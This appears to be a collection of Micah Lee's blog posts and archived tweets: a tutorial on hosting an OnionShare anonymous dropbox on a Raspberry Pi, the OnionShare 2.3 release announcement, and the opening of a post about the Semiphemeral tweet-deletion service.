<p>The technical Snowden reporting that I'm most proud of, the series on XKEYSCORE, has Glenn's name attached but he didn't actually do any work on it. (Neither did Morgan actually...) <a href="https://theintercept.com/2015/07/01/nsas-google-worlds-private-communications/">https://theintercept.com/2015/07/01/nsas-google-worlds-private-communications/</a></p>
<p><em>Posted 10:07 AM · May 13, 2021, 57 Retweets, 582 Likes</em></p>
<hr>
<p>And with that, I'm gonna log off twitter for a bit ✨</p>
<p><em>Posted 10:07 AM · May 13, 2021, 2 Retweets, 367 Likes</em></p>
<hr>
<p>I tried explaining what's going on to my mom and she said, "Why is Glenn Greenwald so grumpy?"</p>
<p>I don't know, Mom. I don't think anyone knows.</p>
<p><em>Posted 8:31 AM · May 14, 2021, 25 Retweets, 379 Likes</em></p>
<h1>Twitter Thread: Glenn Greenwald-related social engineering/death threats</h1><p><em>2021-05-04, by Micah Lee</em></p>
<p><em>Background: This is an archived Twitter thread. For more information, read: <a href="../../../2023/05/elon-banned-me-from-twitter-for-doing-journalism-good-riddance/">Elon banned me from Twitter for doing journalism. Good riddance.</a></em></p>
<p>Original URL of Twitter thread: <a href="https://twitter.com/micahflee/status/1396872399824384000">https://twitter.com/micahflee/status/1396872399824384000</a></p>
<hr>
<p>We're lucky that American fascists are so incompetent at things like social engineering, insurrections, etc.</p>
<p><img src="image1.jpg" alt=""></p>
<p><em>Posted 9:55 AM · May 24, 2021, 110 Retweets, 1,882 Likes</em></p>
<hr>
<p>This other person trying to socially engineer me with this voicemail message is confused. I'm not a member of ANTIFA and therefore have no authority to negotiate treaties on their behalf with the BLM movement.</p>
<p>I'm a Sergeant in the ANFTIA Radical Fridge -- it's a common mistake.</p>
<video src="1396921832020738048.mp4" controls width="640" height="360">Your browser does not support the video tag.</video><p><em> Posted 1:15 PM · May 24, 2021, 40 Retweets, 570 Likes</em></p>
<h1>Running an OnionShare anonymous dropbox on a Raspberry Pi</h1><p><em>2021-02-24, by Micah Lee</em></p>
<p>Now that the command line version of OnionShare has <a href="https://micahflee.com/2021/02/onionshare-tabs-anonymous-chat-cli/">better support for running on headless Linux servers</a>, I figured I should set up a dedicated <a href="https://www.raspberrypi.org/">Raspberry Pi</a> anonymous dropbox server, and while I'm at it, document how I'm doing it in a blog post.</p>
<h2 id="find-a-raspberry-pi">Find a Raspberry Pi</h2><p>Personally, I dug through my cardboard box full of random electronics and pulled out a trusty old Raspberry Pi 3 Model B. After all, who among us doesn't have extra Raspberry Pis laying around in piles of old electronics? If you're not as fortunate as I am, at the time of writing the fanciest model is the Raspberry Pi 4 Model B, and it costs $35.</p>
<p>Raspberry Pis use microSD cards as their hard drive, so you'll also need a microSD card reader that you can plug into your computer to set it up, a micro-USB cable to provide power to your Pi, and an internet connection (ethernet is simplest, but wifi works too).</p>
<h2 id="install-ubuntu-server-20-04-on-the-pi">Install Ubuntu Server 20.04 on the Pi</h2><p>Follow <a href="https://ubuntu.com/tutorials/how-to-install-ubuntu-on-your-raspberry-pi#1-overview">this tutorial from Ubuntu</a> to install Ubuntu on your Pi -- that's what I'm doing. I'm using the Ubuntu Server 20.04.2 LTS (RPi 3/4/400) 64-bit image. Once you get to the step "4. Boot Ubuntu Server" you can come back here.</p>
<p>I don't feel like plugging an HDMI cable and USB keyboard into my Pi, so after plugging in ethernet and power, I'm going to need to discover my Pi's IP address so I can connect to it remotely over the network. I'm using <a href="https://nmap.org/">nmap</a> to do this. (You can install it from your Linux package manager, from Homebrew on a Mac, or from nmap's website on Windows.)</p>
<p>Because my local network IP address is <code>192.168.1.x</code>, I'm going to scan my whole subnet (<code>192.168.1.0/24</code>) for computers with the SSH port (22) open, and one of them is bound to be my Pi:</p>
<pre>
$ nmap -p22 --open 192.168.1.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-23 17:51 PST
Nmap scan report for 192.168.1.46
Host is up (0.0015s latency).
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 256 IP addresses (7 hosts up) scanned in 3.13 seconds
</pre><p>There it is, my Pi's IP address is <code>192.168.1.46</code>. So let's see if I can SSH into it. If you're following along, make sure to use the IP of <em>your</em> Pi, as it's probably different than mine. The default username and password are both <code>ubuntu</code>.</p>
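<p>A quick aside on that <code>/24</code> notation: it leaves 8 bits for host addresses, so 256 of them, which matches nmap's "256 IP addresses" line. Python's <code>ipaddress</code> module can confirm:</p>

```python
import ipaddress

# /24 means the first 24 bits are the network prefix, leaving 8 host bits:
# 2**8 = 256 addresses, matching nmap's "256 IP addresses" line.
subnet = ipaddress.ip_network("192.168.1.0/24")
print(subnet.num_addresses)  # 256
print(ipaddress.ip_address("192.168.1.46") in subnet)  # True
```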
<pre>
$ ssh ubuntu@192.168.1.46
The authenticity of host '192.168.1.46 (192.168.1.46)' can't be established.
ECDSA key fingerprint is SHA256:tdB9dxpe4dIpFfvbjNdPpPVLeBlpTXaSu6SCaabjyFc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.46' (ECDSA) to the list of known hosts.
ubuntu@192.168.1.46's password:
You are required to change your password immediately (administrator enforced)
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1028-raspi aarch64)
[...snip...]
</pre><p>Accept the fingerprint. After logging in, you're forced to reset the password. Set it to something random and save it in your password manager. You do use a <a href="https://ssd.eff.org/en/module/creating-strong-passwords">password manager</a>, right?</p>
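<p>If you'd rather generate that random password yourself than let your password manager do it, here's one way with Python's <code>secrets</code> module (the length and alphabet are my arbitrary choices):</p>

```python
import secrets
import string

# Generate a random password for the Pi: 24 chars from letters and digits
# gives well over 128 bits of entropy. Length and alphabet are arbitrary.
alphabet = string.ascii_letters + string.digits
password = "".join(secrets.choice(alphabet) for _ in range(24))
print(password)
```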
<p>After you reset your password, your connection will close and you'll need to SSH in again:</p>
<pre>
[...snip...]
WARNING: Your password has expired.
You must change your password now and login again!
Changing password for ubuntu.
Current password:
New password:
Retype new password:
passwd: password updated successfully
Connection to 192.168.1.46 closed.
$ ssh ubuntu@192.168.1.46
ubuntu@192.168.1.46's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-1028-raspi aarch64)
[...snip...]
ubuntu@ubuntu:~$
</pre><p><em>(hacker voice)</em> <strong>I'm in.</strong></p>
<p>Go ahead and install updates by running:</p>
<pre>
sudo apt update
sudo apt upgrade -y
</pre><h2 id="install-onionshare">Install OnionShare</h2><p>OnionShare is written in Python, and you can install the <a href="https://docs.onionshare.org/2.3.1/en/advanced.html#command-line-interface">command line version</a> using Python's package manager <code>pip</code>. So first, I must install <code>pip</code>:</p>
<pre>
sudo apt install python3-pip
</pre><p>Now I'm going to install OnionShare itself:</p>
<pre>
pip3 install --user onionshare-cli
</pre><p>When you install programs with <code>pip</code> and use the <code>--user</code> flag, it installs them into <code>~/.local/bin</code>, which isn't in your PATH by default. This will add <code>~/.local/bin</code> to your PATH now and for future SSH sessions:</p>
<pre>
echo "PATH=\$PATH:~/.local/bin" >> ~/.bashrc
source ~/.bashrc
</pre><p>Okay, now try running <code>onionshare-cli</code>. You should see the usage information:</p>
<p><img src="onionshare-usage.png" alt=""></p>
<h2 id="test-it-out-install-tor">Test it out (install tor)</h2><p>Great, so let's start by seeing if we can run a chat server:</p>
<pre>
$ onionshare-cli --chat
OnionShare 2.3.1 | https://onionshare.org/
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ___ _
@@@@@@ @@@@@@@@@@@@@ / _ \ (_)
@@@@ @ @@@@@@@@@@@ | | | |_ __ _ ___ _ __
@@@@@@@@ @@@@@@@@@@ | | | | '_ \| |/ _ \| '_ \
@@@@@@@@@@@@ @@@@@@@@@@ \ \_/ / | | | | (_) | | | |
@@@@@@@@@@@@@@@@ @@@@@@@@@ \___/|_| |_|_|\___/|_| |_|
@@@@@@@@@ @@@@@@@@@@@@@@@@ _____ _
@@@@@@@@@@ @@@@@@@@@@@@ / ___| |
@@@@@@@@@@ @@@@@@@@ \ `--.| |__ __ _ _ __ ___
@@@@@@@@@@@ @ @@@@ `--. \ '_ \ / _` | '__/ _ \
@@@@@@@@@@@@@ @@@@@@ /\__/ / | | | (_| | | | __/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \____/|_| |_|\__,_|_| \___|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
You must install tor to use OnionShare from the command line
</pre><p>Oh right, I need to install tor. That's easy:</p>
<pre>
sudo apt install tor
</pre><p>Okay, let's try again:</p>
<pre>
$ onionshare-cli --chat
OnionShare 2.3.1 | https://onionshare.org/
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ___ _
@@@@@@ @@@@@@@@@@@@@ / _ \ (_)
@@@@ @ @@@@@@@@@@@ | | | |_ __ _ ___ _ __
@@@@@@@@ @@@@@@@@@@ | | | | '_ \| |/ _ \| '_ \
@@@@@@@@@@@@ @@@@@@@@@@ \ \_/ / | | | | (_) | | | |
@@@@@@@@@@@@@@@@ @@@@@@@@@ \___/|_| |_|_|\___/|_| |_|
@@@@@@@@@ @@@@@@@@@@@@@@@@ _____ _
@@@@@@@@@@ @@@@@@@@@@@@ / ___| |
@@@@@@@@@@ @@@@@@@@ \ `--.| |__ __ _ _ __ ___
@@@@@@@@@@@ @ @@@@ `--. \ '_ \ / _` | '__/ _ \
@@@@@@@@@@@@@ @@@@@@ /\__/ / | | | (_| | | | __/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \____/|_| |_|\__,_|_| \___|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Connecting to the Tor network: 100% - Done
Give this address to the recipient:
http://onionshare:appetizer-acid@hhzxxzfsx34ckxjtl3z6cjgfk73tyr3fxbsu3rumiqsgdz6nvmorhnyd.onion
Press Ctrl+C to stop the server
</pre><p>Load the OnionShare address you see in Tor Browser to make sure it works.</p>
<p><img src="torbrowser-chat.png" alt=""></p>
<p>Great.</p>
<p>Press Ctrl-C to quit OnionShare.</p>
<h2 id="start-a-persistent-anonymous-dropbox">Start a persistent anonymous dropbox</h2><p>To let people anonymously upload files to your computer (in this case, your Raspberry Pi) you use <a href="https://docs.onionshare.org/2.3.1/en/features.html#receive-files">receive mode</a>. In the command line this is the <code>--receive</code> flag.</p>
<p>You'll also want to make sure you use <code>--persistent</code>. This will save the Tor onion key into a file so that if you ever, for example, reboot your Raspberry Pi, you can start up your service with the exact same OnionShare address.</p>
<p>You'll also probably want to use <code>--public</code> which disables the default password protection. Basically, this lets you post a link to your anonymous dropbox <a href="https://twitter.com/kenklippenstein/status/1363744555435249665">on Twitter</a> (for example) and anyone can go there to anonymously leak documents to you.</p>
<p>Putting it all together:</p>
<pre>
$ onionshare-cli --receive --persistent ~/anon-dropbox.session --public
OnionShare 2.3.1 | https://onionshare.org/
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ___ _
@@@@@@ @@@@@@@@@@@@@ / _ \ (_)
@@@@ @ @@@@@@@@@@@ | | | |_ __ _ ___ _ __
@@@@@@@@ @@@@@@@@@@ | | | | '_ \| |/ _ \| '_ \
@@@@@@@@@@@@ @@@@@@@@@@ \ \_/ / | | | | (_) | | | |
@@@@@@@@@@@@@@@@ @@@@@@@@@ \___/|_| |_|_|\___/|_| |_|
@@@@@@@@@ @@@@@@@@@@@@@@@@ _____ _
@@@@@@@@@@ @@@@@@@@@@@@ / ___| |
@@@@@@@@@@ @@@@@@@@ \ `--.| |__ __ _ _ __ ___
@@@@@@@@@@@ @ @@@@ `--. \ '_ \ / _` | '__/ _ \
@@@@@@@@@@@@@ @@@@@@ /\__/ / | | | (_| | | | __/
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ \____/|_| |_|\__,_|_| \___|
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
Connecting to the Tor network: 100% - Done
* Running on http://127.0.0.1:17636/ (Press CTRL+C to quit)
Files sent to you appear in this folder: /home/ubuntu/OnionShare
Warning: Receive mode lets people upload files to your computer. Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.
Give this address to the sender:
http://vxat6yszh7o5r2fxzvibxsb4lmfi6yzudobn3o3yz2vhvue3z2xmbqid.onion
Press Ctrl+C to stop the server
</pre><p>Now, load the OnionShare address in Tor Browser to make sure it works.</p>
<p><img src="torbrowser-receive.png" alt=""></p>
<p>It works!</p>
<p>And live web logs get displayed in the terminal as well. For example when I loaded the OnionShare address, this was displayed in the terminal:</p>
<pre>
127.0.0.1 - - [24/Feb/2021 02:36:06] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:07] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/css/style.css HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/js/jquery-3.5.1.min.js HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/js/receive.js HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/img/logo.png HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:08] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/img/logo_large.png HTTP/1.1" 200 -
127.0.0.1 - - [24/Feb/2021 02:36:09] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/img/favicon.ico HTTP/1.1" 200 -
</pre><p>You'll never get to know the IP addresses of people who visit your onion site. Their IP will always look like <code>127.0.0.1</code>. This is how Tor onion services work: you run a service anonymously, and all the clients that connect to your service are anonymous as well. If someone loads your anonymous dropbox while you happen to be looking at the terminal, you'll be able to tell that someone is there because you'll see the logs they generate, but you won't know who it is.</p>
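<p>You can see this from the logs themselves. A quick Python sketch that pulls the client IP field out of the log lines shown above:</p>

```python
# Every visitor shows up as 127.0.0.1 because connections arrive through
# the local Tor daemon, not directly from the client. Parsing the client
# IP field (the first whitespace-separated token) from the logs above:
log_lines = [
    '127.0.0.1 - - [24/Feb/2021 02:36:06] "GET / HTTP/1.1" 200 -',
    '127.0.0.1 - - [24/Feb/2021 02:36:07] "GET /static_nwr7jepc7gzurz2tyf2ddqnaxe/css/style.css HTTP/1.1" 200 -',
]
client_ips = {line.split(" ", 1)[0] for line in log_lines}
print(client_ips)  # {'127.0.0.1'}
```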
<h2 id="upload-a-file-and-then-see-what-was-uploaded">Upload a file, and then see what was uploaded</h2><p>Now, let's try uploading a file. In my case, I'm uploading a ~2.6 MB file called <code>IMG_0417.jpg</code>.</p>
<p>In the terminal you can see the progress of the file as it uploads, and then you can see the location it was saved to:</p>
<pre>
=> 2.5 MiB IMG_0417.jpg
Received: /home/ubuntu/OnionShare/2021-02-24/22.29.20/IMG_0417.jpg
127.0.0.1 - - [24/Feb/2021 22:29:29] "POST /upload-ajax HTTP/1.1" 200 -
</pre><p>But now, how do I actually access this file? There are many ways. Here are some options:</p>
<h3 id="in-macos-or-windows">In macOS or Windows</h3><p>If you use macOS or Windows you can use SFTP software like <a href="https://cyberduck.io/">Cyberduck</a>. For example, here I'm setting up a new connection in Cyberduck called <code>onionsharepi</code>:</p>
<p><img src="cyberduck1.png" alt=""></p>
<p>Then when I connect to it, I can browse the files and download anything to my computer:</p>
<p><img src="cyberduck2.png" alt=""></p>
<p>And finally, I can open <code>IMG_0417.jpg</code> and see what this image I uploaded was.</p>
<p><img src="tor-mask.png" alt=""></p>
<h3 id="in-linux">In Linux</h3><p>In Ubuntu (or other distros that use nautilus as the file manager), I open the file manager, go to "Other Locations", and connect to the server <code>sftp://ubuntu@192.168.1.46/</code>.</p>
<p><img src="ubuntu-files1.png" alt=""></p>
<p>Now I have access to the files that get uploaded to my anonymous dropbox:</p>
<p><img src="ubuntu-files2.png" alt=""></p>
<h2 id="make-sure-the-anonymous-dropbox-is-actually-persistent">Make sure the anonymous dropbox is actually persistent</h2><p>The command we used to start OnionShare in receive mode is:</p>
<pre>
onionshare-cli --receive --persistent ~/anon-dropbox.session --public
</pre><p>This stores all the settings associated with this session, including the secret key required to get this same Tor onion address, in the file <code>anon-dropbox.session</code>.</p>
<p>If you quit OnionShare by pressing Ctrl-C, then run that same command over again (in the terminal press up arrow, then enter), it should start OnionShare again, and the URL should be exactly the same. This is important because if you ever have to quit OnionShare (like maybe you need to unplug the Raspberry Pi and plug it in somewhere else, forcing it to reboot), you'll be able to get your anonymous dropbox up and running again with the same address.</p>
<p>...and yup, I just confirmed persistence works on my end.</p>
<p>You may wish to copy and paste the contents of this file into a note field in your password manager, or otherwise make a secure backup of it. This way when you spill coffee all over your Raspberry Pi, you can get up and running again without too much trouble.</p>
<h2 id="run-onionshare-in-a-screen-session-so-you-can-close-your-terminal">Run OnionShare in a screen session so you can close your terminal</h2><p>So far this works great, but there's a big problem: When you SSH into a remote server (the Pi) and run a command (<code>onionshare-cli</code>), if you close your terminal, get disconnected from wifi, or otherwise end your SSH session, it will close <code>onionshare-cli</code> as well. Ideally you want it to just always be open and running in the background.</p>
<p>A simple way of doing this is using the program <code>screen</code>, a terminal multiplexer (you can also use <code>tmux</code> or whatever else you prefer). If OnionShare is running on your Raspberry Pi, quit it with Ctrl-C. Then from a terminal, install screen and download a simple <code>.screenrc</code> file so it will look a bit nicer:</p>
<pre>
sudo apt install -y screen
wget https://raw.githubusercontent.com/micahflee/dotfiles/master/.screenrc
</pre><p>Then run <code>screen</code>:</p>
<pre>
screen
</pre><p>You should see a new bar at the bottom of the screen with <code>0 bash</code> highlighted in yellow. This means you're inside a screen session now. (If you want to get nerdy, you may wish to teach yourself more about using <code>screen</code> or similar terminal multiplexers.)</p>
<p><em>Now</em> run <code>onionshare-cli</code> again:</p>
<p><img src="onionshare-screen.png" alt=""></p>
<p>Now go ahead and completely close out of the terminal window, and make sure you can still load your OnionShare address. It should load fine, because <code>onionshare-cli</code> should still be running on the Pi in your <code>screen</code> session.</p>
<p>Now let's get back in. Open a new terminal and SSH back into the Pi:</p>
<pre>
ssh ubuntu@192.168.1.46
</pre><p>Once you're in, reconnect your <code>screen</code> session:</p>
<pre>
screen -x
</pre><p>You should see your OnionShare anonymous dropbox again.</p>
<h2 id="some-final-thoughts">Some final thoughts</h2><p>After following this guide, you should have:</p>
<ul>
<li>A Raspberry Pi with Ubuntu Server 20.04 installed on it</li>
<li>The ability to SSH into the server to remotely configure it</li>
<li>An OnionShare anonymous dropbox running in a screen session</li>
<li>The ability to access all the files that get uploaded to your anonymous dropbox on your normal computer</li>
</ul>
<p>Congratulations! You're now equipped to accept leaks from the public. Just let people know that they can load your OnionShare address in Tor Browser to send you stuff anonymously. Here are a few things to keep in mind:</p>
<p>You can keep an eye on it by leaving a terminal open with the <code>screen</code> session attached to see when people access it, and by regularly checking on the files that get uploaded.</p>
<p>Now that you're running a server, it's a good idea to regularly install updates so it doesn't get hacked, and keep an eye out for OnionShare updates as well (you'll be able to update <code>onionshare-cli</code> by running <code>pip3 install --upgrade onionshare-cli</code>). You might also want to do other things to harden your server like start using SSH keys instead of passwords or set up a firewall.</p>
<p><strong>Your Raspberry Pi's hard drive is not encrypted, which means if someone can physically access your Pi, they can simply unplug the microSD card, plug it into their own computer, and copy all of the documents people have uploaded to you.</strong> The best solution is to add disk encryption to this setup (perhaps this will be the target of a future blog post -- if you're interested in that, post in the comments). But in the meantime, whenever someone sends you anything sensitive, you can download it to your computer and then delete it from the Raspberry Pi, and <em>then</em> securely erase the free space on the Pi's microSD card so that it can't be recovered.</p>
<p>To securely delete free space, install the <code>secure-delete</code> package:</p>
<pre>
sudo apt install secure-delete
</pre><p>And then run <code>sfill</code> to overwrite all of the free space:</p>
<pre>
sudo sfill -v -l /
</pre><p>In this command I'm using the flag <code>-l</code> which means "lessens the security. Only two passes are written: one mode with 0xff and a final mode with random values." -- though honestly I think this is fine for almost every use-case. This will take a very long time as it is, but if you leave off the <code>-l</code> it will take about 19 times longer, overwriting your free space 38 times instead of 2 times. (Run <code>man sfill</code> for more information.)</p>
<p><strong>Warning: Receive mode lets people upload files to your computer. Some files can potentially take control of your computer if you open them. Only open things from people you trust, or if you know what you are doing.</strong></p>
<p>This warning is prominently displayed in OnionShare, and I think it's important to point out again. Just as you're instructed not to open sketchy email attachments, you shouldn't blindly open documents that you receive through OnionShare. For a trivial example: if you use Windows, someone can send you <code>backdoor.exe</code>, and if you open that file, they will have hacked you.</p>
<p>If you do get a document and you're worried it might hack you when you open it, here are a few strategies to try:</p>
<ul>
<li>If it's an office document, run it through <a href="https://dangerzone.rocks/">Dangerzone</a> first. This is another piece of software I wrote that turns office documents into PDFs that you can be confident won't hack you.</li>
<li>If you're not concerned with sharing it with third parties:<ul>
<li>You can upload it to <a href="https://www.virustotal.com/">VirusTotal</a> to get it scanned by dozens of anti-virus programs, which can help you decide whether or not to open it.</li>
<li>You can also upload certain types of documents (including office docs, videos, and audio files) to Google Drive, and then view them in your web browser instead of in programs like Word or VLC. If one of these documents tries to hack you, it will instead be trying to hack a container running on Google's infrastructure, letting you view it safely.</li>
</ul>
</li>
<li>Set up a <a href="https://theintercept.com/2015/09/16/getting-hacked-doesnt-bad/">virtual machine</a>, turn networking off, copy the document to your VM, and open it there. If it's malicious it will try to hack your VM instead of your host computer, and if it tries to phone home it will fail because your VM doesn't have networking.</li>
</ul>
<p>Good luck, and I'd love to know if you're running an OnionShare anonymous dropbox of your own.</p>
<p>Oh and if you have any newsworthy leaks, feel free to send them my way: <a href="http://vxat6yszh7o5r2fxzvibxsb4lmfi6yzudobn3o3yz2vhvue3z2xmbqid.onion">http://vxat6yszh7o5r2fxzvibxsb4lmfi6yzudobn3o3yz2vhvue3z2xmbqid.onion</a></p>
<h1 id="onionshare-2-3">OnionShare 2.3 adds tabs, anonymous chat, better command line support, and quite a bit more</h1><p><em>By Micah Lee, posted: 2021-02-21</em></p><p>After a ridiculously long sixteen months (or roughly ten years in pandemic time) I'm excited to announce that OnionShare 2.3 is out! Download it from <a href="https://onionshare.org/">onionshare.org</a>.</p>
<p>This version includes loads of new and exciting features which you can read about in much more detail on the brand new OnionShare documentation website, <a href="https://docs.onionshare.org/">docs.onionshare.org</a>. For now though I'm just going to go over the major ones: tabs, anonymous chat, and better command line support.</p>
<h2 id="doing-all-the-things-at-once">Doing all the things at once</h2><p>In the olden days, OnionShare only did one thing: let you securely and anonymously share files over the Tor network. With time we added new features. You could use it as an <a href="https://micahflee.com/2019/02/onionshare-2/">anonymous dropbox</a>, and then later to <a href="https://micahflee.com/2019/10/new-version-of-onionshare-makes-it-easy-for-anyone-to-publish-anonymous-uncensorable-websites/">host an onion site</a>.</p>
<p>But what if you wanted to, for example, run your own anonymous dropbox <em>as well as</em> share files with someone? If your OnionShare was busy running a service, you couldn't run a second service without stopping the first service. This is all fixed now thanks to tabs.</p>
<p><img src="tabs.png" alt=""></p>
<p>Now when you open OnionShare you are presented with a blank tab that lets you choose between sharing files, receiving files, hosting a website, or chatting anonymously. You can have as many tabs open as you want at a time, and you can easily save tabs (that's what the purple thumbtack in the tab bar means) so that if you quit OnionShare and open it again later, these services can start back up with the same OnionShare addresses.</p>
<p>So with OnionShare 2.3 you can host a few websites, have your own personal anonymous dropbox, and securely send files to people whenever you want, all at the same time. Under the hood, the addition of tabs also makes OnionShare connect to the Tor network faster, especially if you're using a bridge.</p>
<h2 id="secure-anonymous-ephemeral-chat-rooms-that-don-t-log-anything">Secure, anonymous, ephemeral chat rooms that don't log anything</h2><p>Another major new feature is chat. You start a chat service, it gives you an OnionShare address, and then you send this address to everyone who is invited to the chat room (using an encrypted messaging app like Signal, for example). Then everyone loads this address in a <a href="https://www.torproject.org/">Tor Browser</a>, makes up a name to go by, and can have a completely private conversation.</p>
<p><img src="chat-torbrowser.png" alt=""></p>
<p>If you're already using an encrypted messaging app, what’s the point of an OnionShare chat room? It leaves fewer traces.</p>
<p>If, for example, you send a message to a Signal group, a copy of your message ends up on each member's devices (their phones, plus their computers if they've set up Signal Desktop). Even with disappearing messages turned on, it's hard to confirm that all copies of a message are actually deleted from all devices, and from any other places (like notification databases) they may have been saved to. OnionShare chat rooms don't store any messages anywhere, so the problem is reduced to a minimum.</p>
<p>OnionShare chat rooms can also be useful for people wanting to chat anonymously and securely with someone without needing to create any accounts. For example, a whistleblower can send an OnionShare address to a journalist using a disposable e-mail address, and then wait for the journalist to join the chat room, all without compromising their anonymity.</p>
<p>Because OnionShare relies on Tor onion services, connections between the Tor Browser and OnionShare are all end-to-end encrypted (E2EE). When someone posts a message to an OnionShare chat room, they send it to the server through their E2EE onion connection. The OnionShare server then forwards the message to all other members of the chat room through the other members' E2EE onion connections, using WebSockets. OnionShare doesn’t implement any chat encryption on its own. It relies on the Tor onion service’s encryption instead.</p>
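<p>The forwarding pattern just described can be sketched in a few lines of Python. This is a simplified stand-in for illustration only, not OnionShare's actual implementation: plain lists stand in for the members' WebSocket connections, and nothing is ever written to disk:</p>

```python
class ChatRoom:
    """In-memory relay: messages are forwarded to members, never stored."""

    def __init__(self):
        self.connections = {}  # screen name -> inbox (stand-in for a WebSocket)

    def join(self, name):
        self.connections[name] = []

    def post(self, sender, text):
        # Forward to every member except the sender; there is no server-side log.
        for name, inbox in self.connections.items():
            if name != sender:
                inbox.append((sender, text))

room = ChatRoom()
for name in ("alice", "bob", "carol"):
    room.join(name)
room.post("alice", "hello")
print(room.connections["bob"])    # [('alice', 'hello')]
print(room.connections["alice"])  # []
```

<p>The server here only relays; once every inbox is drained, no trace of the conversation remains anywhere.</p>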
<p>Huge thanks to <a href="https://twitter.com/Saptak013">Saptak Sengupta</a> for developing the anonymous chat feature (doing the bulk of the work in like a single day (!), in the midst of a hacker con in Goa, India last March).</p>
<h2 id="onionshare-from-the-command-line">OnionShare from the command line</h2><p><img src="cli.png" alt=""></p>
<p>OnionShare 2.3 finally de-couples the command line and the graphical versions. You can install <code>onionshare-cli</code> on any platform, including headless Linux servers, <a href="https://pypi.org/project/onionshare-cli/">using pip</a>:</p>
<pre>
pip3 install --user onionshare-cli
</pre>
<p>You also need to have <code>tor</code> installed, which you can get from your package manager, or from Homebrew if you're using macOS.</p>
<p>It's simple to use. For example, here's how you start a chat server:</p>
<p><img src="cli-chat.png" alt=""></p>
<p>I hope you enjoy the new version of OnionShare!</p>
<p><em>Note February 21, 2021: OnionShare 2.3 for Linux will be available in <a href="https://flathub.org/">Flathub</a> after <a href="https://github.com/flathub/flathub/pull/2129">this pull request</a> is reviewed and merged, so hang tight. In the meantime, it's already <a href="https://snapcraft.io/onionshare">available in Snapcraft</a> (though it logs analytics), or you can install the <code>.flatpak</code> file directly from <a href="https://onionshare.org/dist/2.3/">onionshare.org/dist/2.3</a>.</em></p>
<p><em>Update February 22, 2021: Version 2.3 had a bug where chat was broken :( but we just released version 2.3.1 which fixes it! :).</em></p>
<p><em>Update February 23, 2021: The Flatpak package is live! Linux users <a href="https://flathub.org/apps/details/org.onionshare.OnionShare">get it from Flathub</a>.</em></p>
<h1 id="semiphemeral-release">Easily automate deleting your old tweets, likes, and DMs with Semiphemeral</h1><p><em>By Micah Lee, posted: 2020-09-10</em></p><p>Roughly one hundred years ago, in June of 2019, <a href="https://micahflee.com/2019/06/semiphemeral-automatically-delete-your-old-tweets-except-for-the-ones-you-want-to-keep/">I released</a> an <a href="https://github.com/micahflee/semiphemeral">open source</a> Twitter privacy tool called Semiphemeral that makes it simple-ish to delete years of old tweets. The great thing about Semiphemeral is that, unlike similar tools, it's flexible: you don't have to delete <em>all</em> of your old tweets if you don't want to. You can, say, choose to keep tweets that have at least 20 likes, flag specific tweets you never want to delete, or delete all your retweets and likes that are older than a week.</p>
<p>But at the time, Semiphemeral was only usable by the nerdiest among us. It required running commands in a terminal window, creating your own Twitter API key, and, if you want to automate it, setting up a cron job on a server. But this is no longer the case!</p>
<p><strong>For the last several months I've been running an easy-to-use hosted version at <a href="https://semiphemeral.com/">Semiphemeral.com</a>. Now <em>anyone*</em> can easily delete their old tweets, likes, and now even direct messages (more on this below).</strong></p>
<p><img src="screenshot.png" alt=""></p>
<h1 id="semiphemeral-is-an-antifascist-service">Semiphemeral is an antifascist service</h1><p>*Well, <em>most people</em>.</p>
<p>In order to use Semiphemeral, you must follow <a href="https://twitter.com/semiphemeral">@semiphemeral</a> on Twitter. Supporters of dictators and anti-democratic demagogues, racists, or other types of fascists will be blocked, and blocked users are ineligible to use Semiphemeral. Everyone deserves privacy on social media, but not everyone is entitled to get that privacy by using this free service.</p>
<p>How does fascist detection work? Right now it's fairly simple. Semiphemeral maintains a list of popular fascist Twitter influencers: extremist demagogues like Trump in the US, Bolsonaro in Brazil, or Modi in India; popular neo-Nazi media personalities like Tucker Carlson or Ben Shapiro; and others.</p>
<p>When you start using Semiphemeral it downloads a history of your tweets and likes. If you've liked tweets from any of those fascists within the last few months, you get automatically blocked and are disqualified from using the service (it automatically unblocks you in a few months, in case you've changed since then).</p>
